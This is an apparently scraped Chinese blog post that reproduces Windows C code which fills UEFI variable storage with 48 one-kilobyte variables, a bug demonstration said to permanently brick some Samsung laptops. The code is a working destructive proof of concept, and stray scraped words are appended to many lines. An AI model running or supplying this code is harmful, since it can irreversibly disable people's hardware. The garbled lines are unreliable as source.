三星笔记本变砖UEFI Bug测试代码

时间 2019-12-23

标签三星笔记本 uefi bug 测试代码栏目三星繁體版

原文原文链接

Bug测试代码以下：(测试前请确认笔记本开启了UEFI模式。还有最重要的——变成砖头了，暂时没办法还原的。三星那边解决方案还没出来。真要实际真机操做请当心，只是给你们看看代码。)dom

#include "stdafx.h"ide

#include <Windows.h>测试

#include <WinBase.h>ui

/* Write 48 UEFI variables of 1K each */this

/* The worst case outcome of this should be an error when the firmware runs out of space */spa

/* However, if run on some Samsung laptops, this will cause the firmware to fail to initialise and prevent the system from ever booting */code

int _tmain(int argc, _TCHAR* argv[])it

{event

char testdata[1024];ast

char name[] = "TestVarXX";

BOOL result;

HANDLE handle = NULL;

TOKEN_PRIVILEGES tp;

ZeroMemory(&tp, sizeof(tp));

if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &handle))

printf("Failed to open process\n");

/* Writing to UEFI variables requires the SE_SYSTEM_ENVIRONMENT_NAME privilege */

if (!LookupPrivilegeValue(NULL, SE_SYSTEM_ENVIRONMENT_NAME, &tp.Privileges[0].Luid))

printf("Failed to locate privilege");

tp.PrivilegeCount = 1;

tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if (!AdjustTokenPrivileges(handle, FALSE, &tp, 0, NULL, 0))

printf("Failed to adjust privileges\n");

for (int i=0; i<48; i++) {

/* Fill variable with 1K of random data */

for (int j=0; j<sizeof(testdata); j++)

testdata[j] = (char)rand();

/* Generate a unique name */

sprintf_s(name, sizeof(name), "TestVar%d", i);

/* Actually write the variable - this calls the SetVariable() UEFI runtime service */

result = SetFirmwareEnvironmentVariableExA(name, "{12345678-1234-1234-1234-1234567890ab}", testdata, sizeof(testdata), 0x07);

if (!result) {

printf("Received error code %ld\n", GetLastError());

break;

}

if (result)

printf("Success");

return 0;

}